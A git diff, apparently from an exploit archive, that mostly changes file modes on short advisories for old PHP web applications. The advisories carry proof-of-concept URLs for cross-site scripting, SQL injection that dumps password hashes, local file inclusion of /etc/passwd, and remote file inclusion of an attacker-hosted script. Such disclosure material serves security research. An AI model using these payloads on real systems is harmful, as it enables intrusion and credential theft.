at end of file +http://www.example.org/sugarcrm/index.php?module=Contacts&action=ShowDuplicates \ No newline at end of file diff --git a/platforms/php/webapps/35469.txt b/platforms/php/webapps/35469.txt old mode 100755 new mode 100644 index c7dde4c03..79872f520 --- a/platforms/php/webapps/35469.txt +++ b/platforms/php/webapps/35469.txt @@ -6,4 +6,4 @@ Successful exploits will allow attacker-supplied HTML and script code to run in Wikiwig 5.01 is vulnerable; other versions may also be affected. -http://www.example.com/wikiwig5.01/_wk/Xinha/plugins/SpellChecker/spell-check-savedicts.php?to_r_list=%3Cscript%3Ealert(0)%3C%2fscript%3E \ No newline at end of file +http://www.example.com/wikiwig5.01/_wk/Xinha/plugins/SpellChecker/spell-check-savedicts.php?to_r_list=%3Cscript%3Ealert(0)%3C%2fscript%3E \ No newline at end of file diff --git a/platforms/php/webapps/35470.txt b/platforms/php/webapps/35470.txt old mode 100755 new mode 100644 index bbe275471..2685ae243 --- a/platforms/php/webapps/35470.txt +++ b/platforms/php/webapps/35470.txt @@ -4,4 +4,4 @@ AplikaMedia CMS is prone to an SQL-injection vulnerability because the applicati A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. -http://www.example.com/page_info.php?id_brt=[Sql_injection] \ No newline at end of file +http://www.example.com/page_info.php?id_brt=[Sql_injection] \ No newline at end of file diff --git a/platforms/php/webapps/35473.txt b/platforms/php/webapps/35473.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35475.txt b/platforms/php/webapps/35475.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35476.txt b/platforms/php/webapps/35476.txt old mode 100755 new mode 100644 index b3166d4e7..2bdf9ec5b --- a/platforms/php/webapps/35476.txt +++ b/platforms/php/webapps/35476.txt @@ -8,4 +8,4 @@ Rating-Widget 1.3.1 is vulnerable; other versions may also be affected. http://www.example.com/wp-content/plugins/rating-widget/view/rating.php?vars[type]=[xss] http://www.example.com/plugins/rating-widget/view/availability_options.php?selected_key=[xss] -http://www.example.com/wp-content/plugins/rating-widget/view/save.php?rw_form_hidden_field_name=[xss] \ No newline at end of file +http://www.example.com/wp-content/plugins/rating-widget/view/save.php?rw_form_hidden_field_name=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/35477.txt b/platforms/php/webapps/35477.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35479.txt b/platforms/php/webapps/35479.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35480.txt b/platforms/php/webapps/35480.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35481.txt b/platforms/php/webapps/35481.txt old mode 100755 new mode 100644 index bbc899f67..34c72099f --- a/platforms/php/webapps/35481.txt +++ b/platforms/php/webapps/35481.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow NewsPortal 0.37 is vulnerable; other versions may also be affected. -http://www.example.com/post.php?newsgroups=<script>alert(28)</script> \ No newline at end of file +http://www.example.com/post.php?newsgroups=<script>alert(28)</script> \ No newline at end of file diff --git a/platforms/php/webapps/35482.txt b/platforms/php/webapps/35482.txt old mode 100755 new mode 100644 index 28c598d42..a59f61284 --- a/platforms/php/webapps/35482.txt +++ b/platforms/php/webapps/35482.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow PluggedOut Blog 1.9.9 is vulnerable; other versions may also be affected. -http://www.example.com/index.php?year=<script>alert(88888)</script> \ No newline at end of file +http://www.example.com/index.php?year=<script>alert(88888)</script> \ No newline at end of file diff --git a/platforms/php/webapps/35490.txt b/platforms/php/webapps/35490.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35491.txt b/platforms/php/webapps/35491.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35492.txt b/platforms/php/webapps/35492.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35493.txt b/platforms/php/webapps/35493.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35496.txt b/platforms/php/webapps/35496.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35497.txt b/platforms/php/webapps/35497.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35498.txt b/platforms/php/webapps/35498.txt old mode 100755 new mode 100644 index d224978f7..90936a7cb --- a/platforms/php/webapps/35498.txt +++ b/platforms/php/webapps/35498.txt @@ -10,4 +10,4 @@ Ripe Website Manager is prone to a cross-site scripting vulnerability and multip Exploiting these issues could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -Ripe Website Manager 1.1 is vulnerable; other versions may also be affected. \ No newline at end of file +Ripe Website Manager 1.1 is vulnerable; other versions may also be affected. \ No newline at end of file diff --git a/platforms/php/webapps/35499.txt b/platforms/php/webapps/35499.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35500.txt b/platforms/php/webapps/35500.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35505.txt b/platforms/php/webapps/35505.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35508.txt b/platforms/php/webapps/35508.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35510.txt b/platforms/php/webapps/35510.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35511.txt b/platforms/php/webapps/35511.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35514.txt b/platforms/php/webapps/35514.txt old mode 100755 new mode 100644 index 28e0fb92d..55af550da --- a/platforms/php/webapps/35514.txt +++ b/platforms/php/webapps/35514.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow OrangeHRM 2.6.2 is vulnerable; other versions may also be affected. -http://www.example.com/orangehrm-2.6.2/templates/recruitment/jobVacancy.php?recruitcode=%3C/script%3E%3Cscript%3Ealert(0)%3C/script%3E \ No newline at end of file +http://www.example.com/orangehrm-2.6.2/templates/recruitment/jobVacancy.php?recruitcode=%3C/script%3E%3Cscript%3Ealert(0)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/35515.txt b/platforms/php/webapps/35515.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35516.txt b/platforms/php/webapps/35516.txt old mode 100755 new mode 100644 index 015f5b2e5..a84b2c9aa --- a/platforms/php/webapps/35516.txt +++ b/platforms/php/webapps/35516.txt @@ -7,4 +7,4 @@ An attacker can exploit this vulnerability to view and execute arbitrary local f webEdition CMS 6.1.0.2 is vulnerable; other versions may also be affected. http://www.example.com/webEdition/index.php?DOCUMENT_ROOT= [lfi]%00 -http://www.example.com/path_to_webEdition/index.php?DOCUMENT_ROOT= [lfi]%00 \ No newline at end of file +http://www.example.com/path_to_webEdition/index.php?DOCUMENT_ROOT= [lfi]%00 \ No newline at end of file diff --git a/platforms/php/webapps/35518.txt b/platforms/php/webapps/35518.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3552.txt b/platforms/php/webapps/3552.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35520.txt b/platforms/php/webapps/35520.txt old mode 100755 new mode 100644 index 387d4b442..d19408143 --- a/platforms/php/webapps/35520.txt +++ b/platforms/php/webapps/35520.txt @@ -6,4 +6,4 @@ Successful exploits will allow attacker-supplied HTML and script code to run in Claroline 1.10 is vulnerable; other versions may also be affected. -"><script>alert(0)</script> \ No newline at end of file +"><script>alert(0)</script> \ No newline at end of file diff --git a/platforms/php/webapps/35521.txt b/platforms/php/webapps/35521.txt old mode 100755 new mode 100644 index 7040c5451..a56730ec4 --- a/platforms/php/webapps/35521.txt +++ b/platforms/php/webapps/35521.txt @@ -16,4 +16,4 @@ Local file include: http://www.example.com/oscss2/admin108/index.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00 -http://www.example.com/oscss2/admin108/popup_image.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00 \ No newline at end of file +http://www.example.com/oscss2/admin108/popup_image.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00 \ No newline at end of file diff --git a/platforms/php/webapps/35522.txt b/platforms/php/webapps/35522.txt old mode 100755 new mode 100644 index cbeabbd93..19a01d047 --- a/platforms/php/webapps/35522.txt +++ b/platforms/php/webapps/35522.txt @@ -7,4 +7,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow [code] GET / HTTP/1.1 Cookie: cms_username=admin">[xss]< -[/code] \ No newline at end of file +[/code] \ No newline at end of file diff --git a/platforms/php/webapps/35523.txt b/platforms/php/webapps/35523.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35524.txt b/platforms/php/webapps/35524.txt old mode 100755 new mode 100644 index fe9c71baa..bd1b49277 --- a/platforms/php/webapps/35524.txt +++ b/platforms/php/webapps/35524.txt @@ -4,4 +4,4 @@ XOOPS is prone to a cross-site scripting vulnerability because it fails to prope An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/[path]/modules/jobs/view_photos.php?lid=-9999&uid="><script>alert(document.cookie);</script> \ No newline at end of file +http://www.example.com/[path]/modules/jobs/view_photos.php?lid=-9999&uid="><script>alert(document.cookie);</script> \ No newline at end of file diff --git a/platforms/php/webapps/35525.txt b/platforms/php/webapps/35525.txt old mode 100755 new mode 100644 index 55cbe4983..454c0eaa1 --- a/platforms/php/webapps/35525.txt +++ b/platforms/php/webapps/35525.txt @@ -8,4 +8,4 @@ GuppY 4.6.14 is vulnerable; other versions may also be affected. http://www.example.com/links.php?lng=fr [sql Injection] http://www.example.com/guestbk.php?lng=fr [sql Injection] -http://www.example.com/articles.php?pg=43&lng=fr [ sql Injection] \ No newline at end of file +http://www.example.com/articles.php?pg=43&lng=fr [ sql Injection] \ No newline at end of file diff --git a/platforms/php/webapps/35526.txt b/platforms/php/webapps/35526.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35528.txt b/platforms/php/webapps/35528.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35535.php b/platforms/php/webapps/35535.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35541.txt b/platforms/php/webapps/35541.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35543.txt b/platforms/php/webapps/35543.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35547.txt b/platforms/php/webapps/35547.txt old mode 100755 new mode 100644 index bf58dcd93..98718cc34 --- a/platforms/php/webapps/35547.txt +++ b/platforms/php/webapps/35547.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc ICJobSite 1.1 is vulnerable; other versions may also be affected. -http://www.example.com/icjobsite/index.php?page=position_details&pid=[SQL-Injection] \ No newline at end of file +http://www.example.com/icjobsite/index.php?page=position_details&pid=[SQL-Injection] \ No newline at end of file diff --git a/platforms/php/webapps/35548.txt b/platforms/php/webapps/35548.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35550.txt b/platforms/php/webapps/35550.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35551.txt b/platforms/php/webapps/35551.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35555.txt b/platforms/php/webapps/35555.txt old mode 100755 new mode 100644 index feb9e697d..03bdf09ae --- a/platforms/php/webapps/35555.txt +++ b/platforms/php/webapps/35555.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow AWCM 2.2 and prior versions are vulnerable. -http://www.example.com/awcm/search.php?search=<script>alert("SecPod-XSS-Test")</script>&where=all \ No newline at end of file +http://www.example.com/awcm/search.php?search=<script>alert("SecPod-XSS-Test")</script>&where=all \ No newline at end of file diff --git a/platforms/php/webapps/35557.txt b/platforms/php/webapps/35557.txt old mode 100755 new mode 100644 index 6a56d348b..2a2bd6304 --- a/platforms/php/webapps/35557.txt +++ b/platforms/php/webapps/35557.txt @@ -4,4 +4,4 @@ PHP-Fusion is prone to an SQL-injection vulnerability because it fails to suffic Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/[Path]/articles.php?article_id=-1+union+select+version()-- \ No newline at end of file +http://www.example.com/[Path]/articles.php?article_id=-1+union+select+version()-- \ No newline at end of file diff --git a/platforms/php/webapps/35559.txt b/platforms/php/webapps/35559.txt old mode 100755 new mode 100644 index 0a6018e4e..9a145baf1 --- a/platforms/php/webapps/35559.txt +++ b/platforms/php/webapps/35559.txt @@ -10,4 +10,4 @@ XML-injection: http://www.example.com/xmlhttp.php?action=username_exists&value=%3Cxml/%3E XSS: -http://www.example.com/xmlhttp.php?action=username_exists&value=%3Cdiv%20xmlns=%22http://www.w3.org/1999/xhtml%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C/div%3E \ No newline at end of file +http://www.example.com/xmlhttp.php?action=username_exists&value=%3Cdiv%20xmlns=%22http://www.w3.org/1999/xhtml%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C/div%3E \ No newline at end of file diff --git a/platforms/php/webapps/35561.txt b/platforms/php/webapps/35561.txt old mode 100755 new mode 100644 index 785338427..2c904a6d4 --- a/platforms/php/webapps/35561.txt +++ b/platforms/php/webapps/35561.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow AdWizz plugin 1.0 is vulnerable; other versions may also be affected. -http://www.example.com/wordpress/wp-content/plugins/ad-wizz/template.php?link=%22;%3C/script%3E%3Cscript%3Ealert(0);{// \ No newline at end of file +http://www.example.com/wordpress/wp-content/plugins/ad-wizz/template.php?link=%22;%3C/script%3E%3Cscript%3Ealert(0);{// \ No newline at end of file diff --git a/platforms/php/webapps/35562.txt b/platforms/php/webapps/35562.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35564.txt b/platforms/php/webapps/35564.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35565.txt b/platforms/php/webapps/35565.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35566.txt b/platforms/php/webapps/35566.txt old mode 100755 new mode 100644 index 06949f1c8..d89502383 --- a/platforms/php/webapps/35566.txt +++ b/platforms/php/webapps/35566.txt @@ -12,5 +12,4 @@ http://www.example.com/showOldPage.yaws?node=home&index=%3E%3C/pre%3E%3CScRiPt%3 http://www.example.com/allRefsToMe.yaws?node=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E Stored XSS: -http://www.example.com/editPage.yaws?node=home - \ No newline at end of file +http://www.example.com/editPage.yaws?node=home \ No newline at end of file diff --git a/platforms/php/webapps/35567.txt b/platforms/php/webapps/35567.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35568.txt b/platforms/php/webapps/35568.txt old mode 100755 new mode 100644 index bbc9a2346..23a9f6579 --- a/platforms/php/webapps/35568.txt +++ b/platforms/php/webapps/35568.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to obtain potentially sensitive infor UseBB 1.0.11 is vulnerable; other versions may also be affected. -http://www.example.com/admin.php?act=/../../config \ No newline at end of file +http://www.example.com/admin.php?act=/../../config \ No newline at end of file diff --git a/platforms/php/webapps/35569.txt b/platforms/php/webapps/35569.txt old mode 100755 new mode 100644 index ecf95e8e0..480a214f5 --- a/platforms/php/webapps/35569.txt +++ b/platforms/php/webapps/35569.txt @@ -8,4 +8,4 @@ XOOPS 2.5.0 is vulnerable; other versions may also be affected. http://www.example.com/banners.php?click=../../../../../../../boot.ini%00 http://www.example.com/banners.php?click&url=../../../../../../../boot.ini%00 -http://www.example.com/banners.php?click&bid=../../../../../../../boot.ini%00 \ No newline at end of file +http://www.example.com/banners.php?click&bid=../../../../../../../boot.ini%00 \ No newline at end of file diff --git a/platforms/php/webapps/3557.txt b/platforms/php/webapps/3557.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35571.txt b/platforms/php/webapps/35571.txt old mode 100755 new mode 100644 index e859f1f5e..f3dbb9011 --- a/platforms/php/webapps/35571.txt +++ b/platforms/php/webapps/35571.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow TextPattern 4.2.0 is vulnerable; other versions may also be affected. -http://www.example.com/index.php?q=<script>alert(888)</script> \ No newline at end of file +http://www.example.com/index.php?q=<script>alert(888)</script> \ No newline at end of file diff --git a/platforms/php/webapps/35572.txt b/platforms/php/webapps/35572.txt old mode 100755 new mode 100644 index ed71de028..b6388de28 --- a/platforms/php/webapps/35572.txt +++ b/platforms/php/webapps/35572.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Redmine 1.0.1 and 1.1.1 are vulnerable; other versions may also be affected. -http://example.com/projects/hg-helloworld/news/[xss] \ No newline at end of file +http://example.com/projects/hg-helloworld/news/[xss] \ No newline at end of file diff --git a/platforms/php/webapps/35574.txt b/platforms/php/webapps/35574.txt old mode 100755 new mode 100644 index 8846e2dd5..4236a5a66 --- a/platforms/php/webapps/35574.txt +++ b/platforms/php/webapps/35574.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to obtain potentially sensitive infor vtiger CRM 5.2.1 is vulnerable; other versions may also be affected. -http://www.example.com/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00 \ No newline at end of file +http://www.example.com/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00 \ No newline at end of file diff --git a/platforms/php/webapps/35575.txt b/platforms/php/webapps/35575.txt old mode 100755 new mode 100644 index bdfccca3e..073abbc2f --- a/platforms/php/webapps/35575.txt +++ b/platforms/php/webapps/35575.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow an attacker to compromise the application and th PrestaShop 1.3.6 and prior are vulnerable; other versions may also be affected. -http://www.example.com/[path]/cms.php?rewrited_url=http://[Shell-Path] \ No newline at end of file +http://www.example.com/[path]/cms.php?rewrited_url=http://[Shell-Path] \ No newline at end of file diff --git a/platforms/php/webapps/35577.txt b/platforms/php/webapps/35577.txt old mode 100755 new mode 100644 index 3ea199bb5..5ccbc9756 --- a/platforms/php/webapps/35577.txt +++ b/platforms/php/webapps/35577.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow vtiger CRM 5.2.1 is vulnerable; other versions may also be affected. -http://www.example.com/vtigercrm/vtigerservice.php?service=%3Cscript%3Ealert%280%29%3C/script%3E \ No newline at end of file +http://www.example.com/vtigercrm/vtigerservice.php?service=%3Cscript%3Ealert%280%29%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/35579.txt b/platforms/php/webapps/35579.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35582.txt b/platforms/php/webapps/35582.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35583.txt b/platforms/php/webapps/35583.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35584.txt b/platforms/php/webapps/35584.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35585.txt b/platforms/php/webapps/35585.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35591.txt b/platforms/php/webapps/35591.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35596.txt b/platforms/php/webapps/35596.txt old mode 100755 new mode 100644 index 2c980fa6a..9dd1cc2dd --- a/platforms/php/webapps/35596.txt +++ b/platforms/php/webapps/35596.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow eGroupware 1.8.001 is vulnerable; other versions may also be affected. -http://www.example.com/egroupware/phpgwapi/js/jscalendar/test.php?lang=%22%3E%3C/script%3E%3Cscript%3Ealert%280%29%3C/script%3E \ No newline at end of file +http://www.example.com/egroupware/phpgwapi/js/jscalendar/test.php?lang=%22%3E%3C/script%3E%3Cscript%3Ealert%280%29%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/35598.txt b/platforms/php/webapps/35598.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3560.txt b/platforms/php/webapps/3560.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35601.txt b/platforms/php/webapps/35601.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35602.txt b/platforms/php/webapps/35602.txt old mode 100755 new mode 100644 index 25eeb504a..d6037e66c --- a/platforms/php/webapps/35602.txt +++ b/platforms/php/webapps/35602.txt @@ -6,4 +6,4 @@ A successful exploit could allow an attacker to compromise the application, acce Etki Video Pro 2.0 is vulnerable; other versions may also be affected. -http://www.example.com/[path]/kategori.asp?cat=1 [SQL Injection] \ No newline at end of file +http://www.example.com/[path]/kategori.asp?cat=1 [SQL Injection] \ No newline at end of file diff --git a/platforms/php/webapps/35603.txt b/platforms/php/webapps/35603.txt old mode 100755 new mode 100644 index dc20e0ee2..1db5670fe --- a/platforms/php/webapps/35603.txt +++ b/platforms/php/webapps/35603.txt @@ -10,4 +10,4 @@ http://www.example.com/wp-content/themes/livewire-edition/thumb.php?src=%3Cbody% http://www.example.com/wp-content/themes/livewire-edition/thumb.php?src=jpg -http://www.example.com/wp-content/themes/livewire-edition/thumb.php?src=http://site/big_file&h=1&w=1 \ No newline at end of file +http://www.example.com/wp-content/themes/livewire-edition/thumb.php?src=http://site/big_file&h=1&w=1 \ No newline at end of file diff --git a/platforms/php/webapps/35604.txt b/platforms/php/webapps/35604.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35605.txt b/platforms/php/webapps/35605.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35607.txt b/platforms/php/webapps/35607.txt old mode 100755 new mode 100644 index b5cf9c8af..448e2041f --- a/platforms/php/webapps/35607.txt +++ b/platforms/php/webapps/35607.txt @@ -10,4 +10,4 @@ The following example URIs are available: http://www.example.com/general.php?file=http://sitename.com/Evil.txt? -http://www.example.com/general.php?file=../../../../../../../etc/passwd \ No newline at end of file +http://www.example.com/general.php?file=../../../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/35608.txt b/platforms/php/webapps/35608.txt old mode 100755 new mode 100644 index df203b746..2c5666e7b --- a/platforms/php/webapps/35608.txt +++ b/platforms/php/webapps/35608.txt @@ -10,4 +10,4 @@ http://www.example.com/wp-content/themes/gazette/thumb.php?src=1%3Cbody%20onload http://www.example.com/wp-content/themes/gazette/thumb.php?src=http://site -http://www.example.com/wp-content/themes/gazette/thumb.php?src=http://site/big_file&h=1&w=1 \ No newline at end of file +http://www.example.com/wp-content/themes/gazette/thumb.php?src=http://site/big_file&h=1&w=1 \ No newline at end of file diff --git a/platforms/php/webapps/35610.txt b/platforms/php/webapps/35610.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35611.txt b/platforms/php/webapps/35611.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35615.txt b/platforms/php/webapps/35615.txt old mode 100755 new mode 100644 index 497fa6e4c..551b474fb --- a/platforms/php/webapps/35615.txt +++ b/platforms/php/webapps/35615.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to execute arbitrary commands within the cont PhpAlbum.net 0.4.1-14_fix06 is vulnerable; other versions may also be affected. -http://www.example.com/main.php?cmd=setup&var1=user&var3=1-file_put_contents('./x.xxx','xxxx') \ No newline at end of file +http://www.example.com/main.php?cmd=setup&var1=user&var3=1-file_put_contents('./x.xxx','xxxx') \ No newline at end of file diff --git a/platforms/php/webapps/35616.txt b/platforms/php/webapps/35616.txt old mode 100755 new mode 100644 index 48b82533e..34bd46e52 --- a/platforms/php/webapps/35616.txt +++ b/platforms/php/webapps/35616.txt @@ -6,4 +6,4 @@ A successful exploit could allow an attacker to compromise the application, acce Agahi Advertisement CMS 4.0 is vulnerable; other versions may also be affected. -http:/www.example.com/view_ad.php?id=-523+union+select+1,2,3,version%28%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- \ No newline at end of file +http:/www.example.com/view_ad.php?id=-523+union+select+1,2,3,version%28%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- \ No newline at end of file diff --git a/platforms/php/webapps/35617.txt b/platforms/php/webapps/35617.txt old mode 100755 new mode 100644 index 77f8677c9..b506b58a6 --- a/platforms/php/webapps/35617.txt +++ b/platforms/php/webapps/35617.txt @@ -4,4 +4,4 @@ Qianbo Enterprise Web Site Management System is prone to a cross-site scripting An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com]/en/Search.Asp?Range=Product&Keyword=[xss] \ No newline at end of file +http://www.example.com]/en/Search.Asp?Range=Product&Keyword=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/35618.txt b/platforms/php/webapps/35618.txt old mode 100755 new mode 100644 index 162719815..cd75be10a --- a/platforms/php/webapps/35618.txt +++ b/platforms/php/webapps/35618.txt @@ -5,4 +5,4 @@ The RunCMS 'partners' module is prone to an SQL-injection vulnerability because Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/[path]/modules/partners/index.php?op=visit_partner&id=1+and+2=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2 \ No newline at end of file +http://www.example.com/[path]/modules/partners/index.php?op=visit_partner&id=1+and+2=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2 \ No newline at end of file diff --git a/platforms/php/webapps/35619.txt b/platforms/php/webapps/35619.txt old mode 100755 new mode 100644 index 383844a16..d738139e2 --- a/platforms/php/webapps/35619.txt +++ b/platforms/php/webapps/35619.txt @@ -10,4 +10,4 @@ PhoenixCMS 1.7.0 is vulnerable; other versions may also be affected. http://www.example.com/[path]/modules.php?name=Work_Probe&file=../../WS_FTP.LOG%00 http://www.example.com/[path]/modules.php?name=News&file=../../WS_FTP.LOG%00 -http://www.example.com/modules.php?name=Surveys&op=results&pollID=3+and+1=2+union+select+1,version(),3,4,5-- \ No newline at end of file +http://www.example.com/modules.php?name=Surveys&op=results&pollID=3+and+1=2+union+select+1,version(),3,4,5-- \ No newline at end of file diff --git a/platforms/php/webapps/3562.txt b/platforms/php/webapps/3562.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35621.txt b/platforms/php/webapps/35621.txt old mode 100755 new mode 100644 index 08121163e..a520bdde1 --- a/platforms/php/webapps/35621.txt +++ b/platforms/php/webapps/35621.txt @@ -9,4 +9,4 @@ An attacker can exploit these vulnerabilities to execute arbitrary server-side s http://www.example.com/[path]/download.php?file_path=[Ev!l-Sh3ll] http://www.example.com/[path]/categories.php?upload_url=[Ev!l-Sh3ll] http://www.example.com/[path]/global.php?config=[Ev!l-Sh3ll -http://www.example.com/[path]/details.php?cat_id_sql=0+AND+2=1 \ No newline at end of file +http://www.example.com/[path]/details.php?cat_id_sql=0+AND+2=1 \ No newline at end of file diff --git a/platforms/php/webapps/35624.txt b/platforms/php/webapps/35624.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35625.txt b/platforms/php/webapps/35625.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35626.txt b/platforms/php/webapps/35626.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35629.txt b/platforms/php/webapps/35629.txt old mode 100755 new mode 100644 index 2c5280693..b912e7d1d --- a/platforms/php/webapps/35629.txt +++ b/platforms/php/webapps/35629.txt @@ -8,4 +8,4 @@ chillyCMS 1.2.1 is vulnerable; other versions may also be affected. http://www.example.com/[path]/core/helpers.include.php?file=[Ev!l-Sh3ll] http://www.example.com/[path]/core/helpers.include.php?path=[Ev!l-Sh3ll] -http://www.example.com/[path]/core/helpers.include.php?fullpath=[Ev!l-Sh3ll] \ No newline at end of file +http://www.example.com/[path]/core/helpers.include.php?fullpath=[Ev!l-Sh3ll] \ No newline at end of file diff --git a/platforms/php/webapps/3563.txt b/platforms/php/webapps/3563.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35630.txt b/platforms/php/webapps/35630.txt old mode 100755 new mode 100644 index 27845604e..4b10d6551 --- a/platforms/php/webapps/35630.txt +++ b/platforms/php/webapps/35630.txt @@ -4,4 +4,4 @@ The 'com_phocadownload' component for Joomla! is prone to a local file-include v An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible. -http://www.example.com/index.php?option=com_phocadownload&controller=../../../../../../../../../../etc/passwd%00 \ No newline at end of file +http://www.example.com/index.php?option=com_phocadownload&controller=../../../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/35631.txt b/platforms/php/webapps/35631.txt old mode 100755 new mode 100644 index 7dff3a691..8061addf0 --- a/platforms/php/webapps/35631.txt +++ b/platforms/php/webapps/35631.txt @@ -4,4 +4,4 @@ CRESUS is prone to an SQL-injection vulnerability because it fails to sufficient Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/$path/ang/recette_detail.php?id=1 {SQL Injection} \ No newline at end of file +http://www.example.com/$path/ang/recette_detail.php?id=1 {SQL Injection} \ No newline at end of file diff --git a/platforms/php/webapps/35632.txt b/platforms/php/webapps/35632.txt old mode 100755 new mode 